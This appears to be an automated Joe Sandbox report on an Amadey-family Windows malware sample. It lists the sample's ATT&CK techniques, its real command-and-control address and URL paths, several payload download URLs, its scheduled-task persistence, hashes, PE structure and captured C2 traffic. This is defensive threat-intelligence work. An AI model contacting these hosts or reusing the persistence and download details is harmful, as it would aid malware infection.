                    Source: Yara matchFile source: 00000008.00000003.2706394486.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.2255300359.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.2237964071.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2181826515.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2278205377.0000000000261000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    12
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    1
                    Scheduled Task/Job
                    251
                    Virtualization/Sandbox Evasion
                    LSASS Memory741
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    12
                    Process Injection
                    Security Account Manager2
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information
                    NTDS251
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput Capture12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    File and Directory Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe53%ReversingLabsWin32.Packed.Themida
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe53%ReversingLabsWin32.Packed.Themida
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://185.215.113.16/100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php100%Avira URL Cloudmalware
                    http://185.215.113.16/Jo89Ku7d/index.phpoM100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpYlu100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php-k100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedb100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php)100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpE100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpi100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php2l100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php~k100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpded100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpXkt100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpnlf100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php5100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpike100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpu100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpiQ100%Avira URL Cloudphishing
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    171.39.242.20.in-addr.arpa
                    unknown
                    unknownfalse
                      unknown
                      86.23.85.13.in-addr.arpa
                      unknown
                      unknownfalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://185.215.113.16/Jo89Ku7d/index.phptrue
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://185.215.113.16/axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.php-kaxplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpncodedbaxplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpoMaxplong.exe, 00000008.00000002.3429938942.0000000000C80000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.php)axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpiaxplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.php2laxplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpEaxplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpYluaxplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.php~kaxplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpXktaxplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpdedaxplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpikeaxplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.php5axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpiQaxplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpuaxplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpnlfaxplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.16
                        unknownPortugal
                        206894WHOLESALECONNECTIONSNLtrue
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1519481
                        Start date and time:2024-09-26 15:40:11 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 57s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:9
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@5/3@2/1
                        EGA Information:
                        • Successful, ratio: 25%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target axplong.exe, PID 5000 because there are no executed function
                        • Execution Graph export aborted for target axplong.exe, PID 7112 because there are no executed function
                        • Execution Graph export aborted for target file.exe, PID 3416 because it is empty
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe
                        TimeTypeDescription
                        09:42:01API Interceptor566258x Sleep call for process: axplong.exe modified
                        15:41:14Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.16file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                        • 185.215.113.16/Jo89Ku7d/index.php
                        file.exeGet hashmaliciousAmadeyBrowse
                        • 185.215.113.16/Jo89Ku7d/index.php
                        file.exeGet hashmaliciousAmadey, Go Injector, XWormBrowse
                        • 185.215.113.16/Jo89Ku7d/index.php
                        file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                        • 185.215.113.16/Jo89Ku7d/index.php
                        file.exeGet hashmaliciousAmadeyBrowse
                        • 185.215.113.16/Jo89Ku7d/index.php
                        file.exeGet hashmaliciousAmadeyBrowse
                        • 185.215.113.16/Jo89Ku7d/index.php
                        file.exeGet hashmaliciousAmadeyBrowse
                        • 185.215.113.16/Jo89Ku7d/index.php
                        file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, Stealc, zgRATBrowse
                        • 185.215.113.16/inc/newbundle2.exe
                        file.exeGet hashmaliciousAmadeyBrowse
                        • 185.215.113.16/Jo89Ku7d/index.php
                        jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                        • 185.215.113.16/inc/XM.exe
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                        • 185.215.113.103
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
                        • 185.215.113.117
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        No context
                        No context
                        Process:C:\Users\user\Desktop\file.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):1943552
                        Entropy (8bit):7.950508600013589
                        Encrypted:false
                        SSDEEP:24576:01nSsCcbDueckihHZoPoEwvv8XbPyg3nwuE3RW2ZeD4W0kTsrJMUK0m4PZMSG:uPlbH/ihHZoWMrlM3ZeDgkEPmWMSG
                        MD5:CC58B885AC20A4B1CDC8E9174A6E8703
                        SHA1:6083C47A6C956443DCA245AA136AF1BDE2630447
                        SHA-256:3FE2E0B2D033BD7237B70928B032193BD7CB8F644A78E88DDB481C90721DB498
                        SHA-512:5490A52189DB5EFADA9E54D4E89008F1D3EC38CBDE19A3C2177D14E6E69A22BB401D1EB2388D86B40ABBFE62C58888D2C4AECE73793F136D016CBD2E800053DB
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 53%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................L...........@.......................... M...........@.................................W...k.............................L...............................L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...cyjncunv.....P2.....................@...zwriwafc......L.....................@....taggant.0....L.."..................@...........................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\file.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:modified
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Reputation:high, very likely benign file
                        Preview:[ZoneTransfer]....ZoneId=0
                        Process:C:\Users\user\Desktop\file.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):304
                        Entropy (8bit):3.41388201938854
                        Encrypted:false
                        SSDEEP:6:kbyXlXUEZ+lX1lOJUPelkDdtE9+AQy0lbMt0:kbA1Q1lOmeeDs9+nVot0
                        MD5:9D623F5AA5166C28B403AD8B3025D801
                        SHA1:A024182AC5FB4070A0392E4D25749E0E7F1A71F1
                        SHA-256:EE87024AEB4B1B8E885B06C9891BF4EFCD7FDB90FCF8DAFA60E971E5646E1C74
                        SHA-512:054950120E2D8AFA4DDF72487D8C6E7F5F25B877F44B21DEA45CB02B3F40F94BEAA78E5343EC37C708F4938B3EC87E956F36E21FD3D308B55D1A22FC374793CE
                        Malicious:false
                        Reputation:low
                        Preview:.....r1.i<.D. .].Dy.F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................*.@3P.........................
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.950508600013589
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'943'552 bytes
                        MD5:cc58b885ac20a4b1cdc8e9174a6e8703
                        SHA1:6083c47a6c956443dca245aa136af1bde2630447
                        SHA256:3fe2e0b2d033bd7237b70928b032193bd7cb8f644a78e88ddb481c90721db498
                        SHA512:5490a52189db5efada9e54d4e89008f1d3ec38cbde19a3c2177d14e6e69a22bb401d1eb2388d86b40abbfe62c58888d2c4aece73793f136d016cbd2e800053db
                        SSDEEP:24576:01nSsCcbDueckihHZoPoEwvv8XbPyg3nwuE3RW2ZeD4W0kTsrJMUK0m4PZMSG:uPlbH/ihHZoWMrlM3ZeDgkEPmWMSG
                        TLSH:F4953347BAC33679D59404BD6A1272D07F605F6971CAEB28EF43EC2E68531180BB3C66
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                        Icon Hash:00928e8e8686b000
                        Entrypoint:0x8cf000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                        Instruction
                        jmp 00007FA22C66F8BAh
                        jbe 00007FA22C66F8D3h
                        add byte ptr [eax], al
                        jmp 00007FA22C6718B5h
                        add byte ptr [ebx], al
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+00000000h], cl
                        add byte ptr [eax], al
                        add byte ptr [edx], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx+00000080h], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x4cdb0c0x10cyjncunv
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x4cdabc0x18cyjncunv
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x680000x2de0008043589a9842e3505e95340e402c5abFalse0.9975412976839237data7.986737660676203IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x690000x1e00x200af019b2fc3d1c8173dd6ec327e902497False0.580078125data4.4894965334426225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x6b0000x2ba0000x200d34f1ce82d85beb4d192b6e99f356e0eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        cyjncunv0x3250000x1a90000x1a8e00a315ffa18c69612ee4bdb5f29271bbf1False0.9946675492791998data7.953951929244691IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        zwriwafc0x4ce0000x10000x400d2599b3c632a11fb27d89fa5ec5045caFalse0.7900390625data6.204233570717054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x4cf0000x30000x220087141142fe873d9058849b397387f1a6False0.0646829044117647DOS executable (COM)0.7540607977810064IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_MANIFEST0x4cdb1c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                        DLLImport
                        kernel32.dlllstrcpy
                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-09-26T15:42:34.422694+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.652348185.215.113.1680TCP
                        TimestampSource PortDest PortSource IPDest IP
                        Sep 26, 2024 15:42:02.713953018 CEST5231980192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:02.719095945 CEST8052319185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:02.719199896 CEST5231980192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:02.719383001 CEST5231980192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:02.724486113 CEST8052319185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:03.542167902 CEST8052319185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:03.542377949 CEST5231980192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:03.544769049 CEST5231980192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:03.549756050 CEST8052319185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:03.781316042 CEST8052319185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:03.781383038 CEST5231980192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:03.888513088 CEST5231980192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:03.888875008 CEST5232080192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:03.893737078 CEST8052320185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:03.893832922 CEST5232080192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:03.894004107 CEST5232080192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:03.895025969 CEST8052319185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:03.895092964 CEST5231980192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:03.898829937 CEST8052320185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:04.775163889 CEST8052320185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:04.775306940 CEST5232080192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:04.776247978 CEST5232080192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:04.781374931 CEST8052320185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:05.142745972 CEST8052320185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:05.142849922 CEST5232080192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:05.247565031 CEST5232080192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:05.247884035 CEST5232180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:05.252887964 CEST8052320185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:05.252981901 CEST5232080192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:05.253014088 CEST8052321185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:05.253103018 CEST5232180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:05.253216028 CEST5232180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:05.258680105 CEST8052321185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:05.976547956 CEST8052321185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:05.976666927 CEST5232180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:05.977672100 CEST5232180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:05.982745886 CEST8052321185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:06.215785027 CEST8052321185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:06.215920925 CEST5232180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:06.326556921 CEST5232180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:06.326868057 CEST5232280192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:06.331922054 CEST8052322185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:06.331998110 CEST8052321185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:06.332128048 CEST5232180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:06.332142115 CEST5232280192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:06.332247019 CEST5232280192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:06.337362051 CEST8052322185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:07.408618927 CEST8052322185.215.113.16192.168.2.6
                        Sep 26, 2024 15:42:07.408725977 CEST5232280192.168.2.6185.215.113.16
                        Sep 26, 2024 15:42:07.409511089 CEST5232280192.168.2.6185.215.113.16
